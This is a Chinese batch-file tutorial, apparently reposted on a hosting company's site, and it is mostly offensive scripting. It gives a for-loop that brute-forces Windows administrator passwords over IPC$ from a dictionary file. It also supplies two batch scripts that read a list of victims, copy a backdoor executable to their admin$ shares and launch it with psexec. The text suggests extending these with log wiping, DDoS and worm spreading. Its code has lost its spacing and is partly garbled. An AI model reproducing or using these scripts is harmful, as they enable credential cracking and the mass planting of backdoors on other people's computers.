批处理编程- -介绍
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
rd"/u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。 最主要的命令是一条:for/fi%in(dict.txt)donetuse\ip\ipc$"i%"/u:"administrator" 用i%来表示admin的密码,在dict.txt中这个取i%的值用netuse命令来连接。然后将程序运行结果传递给find命令-- for/fi%%in(dict.txt)donetuse\ip\ipc$"i%%"/u:"administrator"|find":命令成功完成">>D:\ok.txt,这样就ko了。 sample3: 你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件, 可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。 主要命令也只有一条:(在批处理文件中使用FOR命令时,指定变量使用%%variable) @for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcalldoor.bat%%i%%j%%k tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i%j%k。 而cultivate.bat无非就是用netuse命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(Iferrorlever=)来筛选成功种植后门的主 机,并echo出来,或者echo到指定的文件。 delims=表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i%%j%%k表示的对象来排 列,一般就是ippasswordusername。 代码雏形: ---------------cutherethensaveasabatchfile(Icallitmain.bat)--------------------------- @echooff @if"%1"==""gotousage @for/f"tokens=1,2,3delims="%%iin(victim.txt)dostartcallIPChack.bat%%i%%j%%k @gotoend :usage @echorunthisbatchindosmodle.orjustdouble-clickit. :end ---------------cutherethensaveasabatchfile(Icallitmain.bat)--------------------------- -------------------cutherethensaveasabatchfile(Icallitdoor.bat)----------------------------- @netuse\%1\ipc$%3/u:"%2" @iferrorlevel1gotofailed @echoTryingtoestablishtheIPC$connection…………OK @copywindrv32.exe\%1\admin$\system32&&ifnoterrorlevel1echoIP%1USER%2PWD%3>>ko.txt @psexec\%1c:\winnt\system32\windrv32.exe @psexec\%1netstartwindrv32&&ifnoterrorlevel1echo%1Backdoored>>ko.txt :failed @echoSorrycannotconnectedtothevictim. -----------------cutherethensaveasabatchfile(Icallitdoor.bat)-------------------------------- 这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容 尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究. 二.如何在批处理文件中使用参数 批处理中可以使用参数,一般从1%到9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。 sample1:fomat.bat @echooff if"%1"=="a"formata: :format @formata:/q/u/auotset @echopleaseinsertanotherdisktodriverA. @pause @gotofomat 这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bata,呵呵,好像有点画蛇添足了~^_^ sample2: 当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ippasswordusername当 着参数来赋给这个批处理,这样就不用每次都打命令了。 @echooff @netuse%\ipc$"2%"/u:"3%"注意哦,这里PASSWORD是第二个参数。 @iferrorlevel1echoconnectionfailed 怎 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: dos常用命令列表与使用说明下一篇: Doskey命令的使用方法
关于批处理编程- -介绍的所有评论